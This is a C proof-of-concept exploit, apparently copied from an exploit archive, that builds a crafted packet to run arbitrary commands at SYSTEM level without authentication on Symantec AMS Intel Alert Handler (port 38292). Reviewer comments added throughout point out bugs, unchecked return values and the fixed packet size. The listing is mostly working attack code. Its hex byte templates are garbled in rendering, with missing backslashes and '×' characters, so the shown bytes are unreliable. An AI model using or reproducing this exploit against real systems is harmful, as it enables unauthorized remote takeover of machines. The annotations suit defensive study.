Symantec AMS Intel Alert Handler Service Design Flaw
Symantec AMS Intel Alert Handler Service Design Flaw
====================================================
// Remote command execution at System level without authentication
// Advisory:https://www.foofus.net/?page_id=149
// Exploit Title: Symantec AMS Intel Alert Handler service Design Flaw
// Date: 07/28/10
// Author: Spider
// Software Link: http://www.foofus.net/~spider/code/ams-cmd.cpp.txt
// Tested on: Symantec SAVCE 10.1.8 and earlier with AMS installed
// POC code to execute commands on a system vulnerable to the AMS2
// design flaw of Intel Alert Handler service (hndlrsvc.exe)
// within Symantec SAVCE 10.1.8 and earlier
// ***Created by Spider July 2009***
//——————–Foofus.net————————-
#include <stdio.h>
#include <dos.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
// Scratch buffer in which main() assembles the outgoing packet. It has static
// storage, so every byte main() does not write stays zero -- and main() sends
// sizeof(payload) (1000 bytes), so those zero bytes go on the wire too.
unsigned char payload[1000];
// Byte templates that main() copies into payload, in this order: the first
// 356 bytes of inject1, all 15 bytes of cmdother, all 110 bytes of inject2
// (the counts come from the memcpy size and loop bounds in main(), not from
// the literals themselves). Two positions inside inject1 are overwritten with
// command-length bytes before the copy.
// NOTE(review): as rendered on this page the literals are not valid C hex
// escapes (backslashes are missing and some 'x' characters appear as '×'),
// so the byte values shown here cannot be taken at face value.
unsigned char inject1[] =
"xffxffxffxffxffxffxffxffx00×00"
"x02×00x95×94xc0xa8×02x64×00x00×00x00×00x00×00x00"
"xe8×03x00×00x50×52x47×58x43×4ex46×47x10×00x00×00"
"x00×00x00×00x04×41x4cx48×44x5cx46×00x00×01x00×00"
"x00×01x00×0ex00×52x69×73x6bx20×52x65×70x61×69x72"
"x65×64x00×25x00×53x79×6dx61×6ex74×65x63×20x41×6e"
"x74×69x56×69x72×75x73×20x43×6fx72×70x6fx72×61x74"
"x65×20x45×64x69×74x69×6fx6ex00xf9×1dx13×4ax3fx0c"
"x00×4cx41×42x53×59x53×54x45×4dx2dx31×00x08×08x0a"
"x00×52x69×73x6bx20×4ex61×6dx65×00x07×00x05×00x54"
"x65×73x74×00x08×0ax00×46x69×6cx65×20x50×61x74×68"
"x00×07x00×05x00×54x65×73x74×00x08×11x00×52x65×71"
"x75×65x73×74x65×64x20×41x63×74x69×6fx6ex00×07x00"
"x05×00x54×65x73×74x00×08x0ex00×41x63×74x75×61x6c"
"x20×41x63×74x69×6fx6ex00×07x00×05x00×54x65×73x74"
"x00×08x07×00x4cx6fx67×67x65×72x00×07x00×05x00×54"
"x65×73x74×00x08×05x00×55x73×65x72×00x07×00x05×00"
"x54×65x73×74x00×08x09×00x48×6fx73×74x6ex61×6dx65"
"x00×0ex00×0cx00×4cx41×42x53×59x53×54x45×4dx2dx31"
"x00×08x13×00x43×6fx72×72x65×63x74×69x76×65x20×41"
"x63×74x69×6fx6ex73×00x07×00x05×00x54×65x73×74x00"
"x00×07x08×12x00×43x6fx6ex66×69x67×75x72×61x74×69"
"x6fx6ex4ex61×6dx65×00x22×00x20";
unsigned char cmdother[] =
"x00×08x0cx00×43x6fx6dx6dx61×6ex64×4cx69×6ex65";
unsigned char inject2[] =
"x00×08x08×00x52×75x6ex41×72x67×73x00×04x00×02x00"
"x20×00x03×05x00×4dx6fx64×65x00×04x00×02x00×00x00"
"x0ax0dx00×46x6fx72×6dx61×74x53×74x72×69x6ex67×00"
"x02×00x00×00x08×12x00×43x6fx6ex66×69x67×75x72×61"
"x74×69x6fx6ex4ex61×6dx65×00x02×00x00×00x08×0cx00"
"x48×61x6ex64×6cx65×72x48×6fx73×74x00×0bx00×09x00"
"x44×45x41×44x42×45x45×46x00×00x00×00x00";
// Prints the usage line for this tool after clearing the console.
// proga: argv[0], shown as the program name in the usage text.
// Review: system("cls") spawns a command interpreter just to clear the
// screen -- Windows-only and an unnecessary process creation for a usage
// message. The bare 'n' in the format string is presumably a "\n" escape
// that lost its backslash when the listing was published.
void banner (char *proga)
{
system("cls");
printf("nUse: %s <ip> <command>n", proga);
}
// Entry point: builds one crafted packet from argv[2] (the command string,
// capped at 128 characters) and sends it once to argv[1] on TCP port 38292.
// Review notes, defender's view:
//  - Only connect() and send() have their results checked; WSAStartup(),
//    socket(), inet_addr(), closesocket() and WSACleanup() do not.
//  - Every error path calls exit(0), so failures report a success status.
//  - send() transmits sizeof(payload) == 1000 bytes rather than the number
//    of bytes actually assembled, so on the wire this shows up as a
//    fixed-size 1000-byte TCP payload to port 38292 (the unused tail is
//    zero because payload has static storage).
//  - The bare 'n' characters in the printf formats are presumably "\n"
//    escapes whose backslashes were lost when the listing was published.
int main ( int argc, char *argv[] )
{
SOCKET sock;
WSADATA wsa;
struct sockaddr_in addr;   // never zeroed: sin_zero is left indeterminate
printf(" __ ___ __ __ __ n");
printf(" | / \ | / _/___ |__| _\ |___ _ __ | / \ | n");
printf("\_\\ //_/ \_ \ . \| |/ . / ._\| `_/ \_\\ //_/n");
printf(" .’/()\’. /___/ _/|__|\___\___\|_| .’/()\’. n");
printf(" \ \ / / |_\ \ \ / / n");
printf(" AMS Remote Command Tooln");
int port;   // unused: the destination port is hard-coded below
if ( argc < 3 )
{
banner(argv[0]);
exit(0);   // usage error, yet the process exits with status 0
}
char *ip_addr = argv[1];
int length = (int)strlen(argv[2]);
// The 128-character cap bounds the writes below: the highest index written
// into payload is 486 + 2*length, i.e. 742 at most, inside payload[1000].
if (length > 128)
{
// BUG: both format strings contain "%s" but no argument is supplied, so
// printf reads a vararg that does not exist (undefined behavior). Remove
// the "%s" or pass a string for it.
printf("n WARNING WARNING WARNING %s n");
printf("n Input Command String Greater than 128 Characters is not Permited %s n");
exit (0);
}
// building injection packet
// Two hard-coded offsets inside the inject1 template receive command-length
// bytes, then the first 356 bytes of the template are copied into payload.
inject1[353] = length+3;
inject1[355] = length+1;
memcpy(payload,inject1,356);
int a = 356;
// Append the command string (indices 357 .. 356+length).
for (int i = 0; i<(length); i++)
{
a=a+1;payload[a] = argv[2][i];
}
int b = a;
// Append all 15 bytes of the cmdother template.
for (int i = 0; i<=14; i++)
{
b=b+1;payload[b] = cmdother[i];
}
int c = b;
// Two more length bytes at fixed offsets after cmdother, then the command
// string a second time starting at c+6.
payload[c+2] = length+3;
payload[c+4] = length+1;
int d = c+5;
for (int i = 0; i<length; i++)
{
d=d+1;payload[d] = argv[2][i];
}
int e = d;
// Append all 110 bytes of the inject2 template.
for (int i = 0; i<=109; i++)
{
e=e+1;payload[e] = inject2[i];
}
// setting up socket and sending packet
printf("[] preparing….n");
WSAStartup(MAKEWORD(2,0), &wsa);   // return value ignored
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);   // INVALID_SOCKET not checked
addr.sin_family = AF_INET;
addr.sin_port = htons(38292);   // destination port is hard-coded
addr.sin_addr.s_addr = inet_addr(ip_addr);   // INADDR_NONE (unparsable address) not checked
printf("[] connecting..n");
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 )
{ printf("[-] connection failed!n"); exit(0); }   // socket not closed, status 0
printf("[] sending crafted packet 1 …n");
// Sends the whole 1000-byte buffer, not just the bytes assembled above.
if ( send(sock, payload, sizeof(payload), 0) == -1 )
{ printf("[-] send failed!n"); exit(0); }   // socket not closed, status 0
closesocket(sock);
WSACleanup();
return 0;
}
Source: http://inj3ct0r.com/exploits/13498
